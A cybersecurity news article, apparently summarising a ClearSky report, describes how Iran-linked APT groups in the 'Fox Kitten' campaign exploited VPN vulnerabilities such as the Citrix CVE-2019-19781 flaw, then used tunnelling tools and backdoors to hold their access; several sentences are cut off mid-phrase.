The campaign targeted dozens of companies and organizations in Israel and around the world, experts pointed out that the most successful and significant attack vector used by the Iranian hackers was the exploitation of
Iran-linked hackers have targeted companies from different sectors, including IT, Telecommunication, Oil, and Gas, Aviation, Government, and Security”
“This attack vector is not used exclusively by the Iranian APT groups; it became the main attack vector for cybercrime groups, ransomware attacks, and other state-sponsored offensive groups.” reads the report published by ClearSky.
“We assess this attack vector to be significant also in 2020 apparently by exploiting new vulnerabilities in VPNs and other remote systems (such as the latest one existing in Citrix). Iranian APT groups have developed good technical offensive capabilities and are able to exploit 1-day vulnerabilities in relatively short periods of time, starting from several hours to a week or two.”
Experts explained that Iranian hackers have focused their interest in 1-day flaws and developed a significant capability in developing working exploits for them that were employed in their
ClearSky confirms that Iranian APT groups in some cases exploited VPN vulnerabilities within hours after their public disclosure.
The investigation Fox Kitten Campaign revealed an overlap, with medium-high probability, between the infrastructure used by the attackers and the one associated
In 2019, Iran-linked APT groups were able to quickly exploit the vulnerabilities
The attacks exploiting the above issued were initially detected at the end of August, recently Iran-linked hackers also employed exploits for CVE-2019-19781 Citrix “ADC” VPN flaw in their attacks.
Attackers exploit the VPN flaws to access the enterprise networks, infect systems with a
After the attackers have exploited vulnerabilities in the VPN systems to breach in the target network, they perform several actions and used multiple tools to maintain their foothold in the network with high privileges.
The threat actors also used legitimate software like Putty, Plink, Ngrok, Serveo, or FRP in their attacks.
The attacks part of the Fox Kitten Campaign observed by ClearSky aimed that gather information on the target networks and plant backdoors, but experts fear that once inside the target infrastructure the hackers could use data wiper (i.e. ZeroCleare and Dustman) in future attacks.
Further technical details on the Fox Kitten Campaign, including indicators of compromise (IOCs), are reported in the analysis published by ClearSky.